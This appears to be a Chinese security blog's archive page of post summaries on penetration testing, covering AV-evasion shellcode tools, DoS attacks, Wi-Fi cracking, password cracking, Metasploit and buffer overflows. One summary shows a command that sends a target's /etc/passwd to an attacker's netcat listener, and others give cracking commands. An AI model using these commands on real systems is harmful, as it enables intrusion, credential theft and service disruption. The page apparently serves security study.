03 2019 档案
摘要:今天整理以前的笔记,把这部分工具整理了一下,虽然没有白利用稳,但这些工具也能在一定程度起到一定的免杀作用。 DKMC 项目地址: https://github.com/Mr-Un1k0d3r/DKMC 可以创建一个 outputs 文件夹 存放 shellcode 启动 python dkmc.py
阅读全文
摘要:PCAP 报文就是抓取实际在网络中传输的图片,视频等数据,然后以PCAP 格式存储形成的文件。工作中对离线的数据包进行回溯分析,有时会遇到将 PCAP 中的码流还原成相应的图片、视频、邮件等原有格式的需求。从...
阅读全文
摘要:1.安装CA证书 生成一个证书文件 http://127.0.0.1/certsrv/ 申请证书 选择高级证书申请 将之前生成的base64证书文件内容贴进来 ok,完成 挂起的申请—所有任务—颁发 在颁发的证书中可以看到我们已经申请好 的证书。 访问http://127.0.0.1/certsrv
阅读全文
摘要:ssh本地端口转发 (1)SSH 支持双向通信隧道 将其他 TCP 端口的通信通过 SSH 链接来转发 用 SSH 作为传输协议,对流量自动加解密 突破防火墙访问规则的限制,可用于FQ (2)SSH 本地端口转发 使效果类似于 rinetd 将一本地端口与远程服务器建立隧道 (3)建立双向安全隧道
阅读全文
摘要:1.筛选器 ip.addr==192.168.88.160 and tcp.port==80 !tcp 查看分tcp的协议 frame.len<=150 查看长度小于等于150字节的数据包 捕获tcp中带有psh和ack标志偏移位为13的的数据包 tcp[13]==0x18 将常用筛选条件到添加删选
阅读全文
摘要:今天整理以前的笔记,把这部分工具整理了一下,虽然没有白利用稳,但这些工具也能在一定程度起到一定的免杀作用。 DKMC 项目地址: https://github.com/Mr-Un1k0d3r/DKMC 可以创建一个 outputs 文件夹 存放 shellcode 启动 python dkmc.py
阅读全文
摘要:nc -lvvp 7080 开启侦听 cancel -u “$(cat /etc/passwd)” -h 192.168.0.101:3321 在靶机上执行命令 攻击机成功接收到靶机发送信息。
阅读全文
摘要:ssh本地端口转发 (1)SSH 支持双向通信隧道 将其他 TCP 端口的通信通过 SSH 链接来转发 用 SSH 作为传输协议,对流量自动加解密 突破防火墙访问规则的限制,可用于FQ (2)SSH 本地端口转发 使效果类似于 rinetd 将一本地端口与远程服务器建立隧道 (3)建立双向安全隧道
阅读全文
摘要:1.安装CA证书 生成一个证书文件 http://127.0.0.1/certsrv/ 申请证书 选择高级证书申请 将之前生成的base64证书文件内容贴进来 ok,完成 挂起的申请—所有任务—颁发 在颁发的证书中可以看到我们已经申请好 的证书。 访问http://127.0.0.1/certsrv
阅读全文
摘要:1. 简介匿名者发布的 DoS 工具LOICHOICDDoSer招募志愿者发放以上工具以上 DoS 工具不隐藏真实 IP 地址免费DDOS攻击测试工具大合集 FreeBuf 下载链接2. LOIChttps:...
阅读全文
摘要:拒绝服务分类攻击带宽攻击并发消耗cpu内存攻击代码漏洞1. rudy(r-y dead yet)1. 简介慢速应用层HTTP POST攻击,与slowhttptest原理相同每次只传输一个字节的数据美剧黑客军...
阅读全文
摘要:1. 简介应用服务漏洞服务代码存在漏洞,遇异常提交数据时程序崩溃应用处理大量并发请求能力有限,被拒绝的是应用或OS缓冲区溢出漏洞向目标函数随机提交数据,特定情况下数据覆盖临近寄存器或内存影响: 远程代码执行、...
阅读全文
摘要:1. 简介简单网络管理协议Simmple Network Management Protocol一般用来监控和管理网络设备服务端口UDP 161/162管理站(manager/客户端)、被管理设备(agent...
阅读全文
摘要:1. 简介主要针对早期微软操作系统(95、98、3.x、nt)近些年有人发现对 2.x 版本的安卓系统、6.0 IOS 系统攻击有效原理很有趣使用 IP 分段偏移量之间分段覆盖,接收端处理分段覆盖时可被拒绝服...
阅读全文
摘要:1. 简介2008年由Jack C.Louis 发现针对TCP服务的拒绝服务攻击消耗被攻击目标系统资源与攻击目标建立大量socket链接完成三次握手,最后的ACK包中window大小为0 (客户端不接收数据)...
阅读全文
摘要:1. 简介世界上最古老的DDoS攻击技术,smurt攻击只发生在局域网中向广播地址发送伪造源地址的 ICMP echo Request (ping)包LAN 所有计算机向伪造源地址返回响应包对现代操作系统几乎...
阅读全文
摘要:1. 简介DoS 不是 DOS( Denial of Service)利用程序漏洞使服务器奔溃利用大流量一对一资源耗尽DDoS 分布式拒绝服务(Distributed Denial of Service)一对...
阅读全文
摘要:AIRTUN-NGRepeateWDS/Bridge扩展无线侦听的距离要求两块网卡都置入monitor模式airtun-ng -a –repeat –bssid -i wlan0mon wlan2monw...
阅读全文
摘要:AIRDECAP-NG去除802.11头airdecap-ng -b 1.pcap解密WEP加密数据airdecap-ng -w -b 1.pcap必须有与AP建立关联关系解密WPA加密数据airdeca...
阅读全文
摘要:EVIL TWIN AP / ROGUE AP3vilTwinAttackergit clone https://github.com/P0cL4bs/3vilTwinAttacker.gitcd 3vilT...
阅读全文
摘要:WPS (WIRELESS PROTECTED SETUP)WPS是WiFi联盟2006年开放的一项技术通过PIN码来简化无线接入的操作,无需记住PSK路由器和网卡各按一个按钮就能接入无线PIN码是分为前后各...
阅读全文
摘要:JTR破解密码测试效果john –wordlist=password.lst –rules –stdout | grep -i Password123破解调用john –wordlist=pass.list ...
阅读全文
摘要:WPA PSK攻击只有一种密码破解方法WPA不存在WEP的弱点只能暴力破解CPU资源时间字典质量网上共享的字典泄露密码地区电话号码段Crunch生成字典kali中自带的字典文件WPA PSK攻击PSK破解过程...
阅读全文
摘要:密钥交换无线网络设计用于一组无线设备通信关联到同一AP的设备共享无线信道单播、广播、组播安全特性要求不同单播通信需要单独密钥加密通信双方流量pairwise key: 对偶密钥 (PTK)组播通信需要信任域内...
阅读全文
摘要:MSFMetasploit FrameWork MSF渗透测试攻击框架metasploit v4.14.10-dev开发版是免费的,自动集成在kali 里正式版是收费的https://www.metasplo...
阅读全文
摘要:本地提权已实现本地权限账号登录远程溢出直接获得账号密码系统账号之间的权限隔离操作系统安全的基础用户空间 user内核空间 system系统账号用户账号登陆时获取权限密码服务账号无需用户登录已在后台启动服务Wi...
阅读全文
摘要:启动一个文本文件tasklist查看进程列表可以看到notepad.exe正在后台运行procdump -ma notepad.exe notepad.dmp-m memory-a all意思就是将和note...
阅读全文
摘要:电子取证使用dumpit工具将计算机内存镜像保存。并生成raw文件格式文件。检测镜像文件基本信息volatility -f 2008.raw imageinfo检测进程列表及物理内存位置volatility ...
阅读全文
摘要:原理:crossfire 1.9.0 版本接受入站 socket 连接时存在缓冲区溢出漏洞。工具:调试工具:edb;###python在漏洞溢出方面的渗透测试和漏洞攻击中,具有很大的优势实验对象:crossf...
阅读全文
摘要:一、基本概念缓冲区溢出:当缓冲区边界限制不严格时,由于变量传入畸形数据或程序运行错误,导致缓冲区被填满从而覆盖了相邻内存区域的数据。可以修改内存数据,造成进程劫持,执行恶意代码,获取服务器控制权限等。在Win...
阅读全文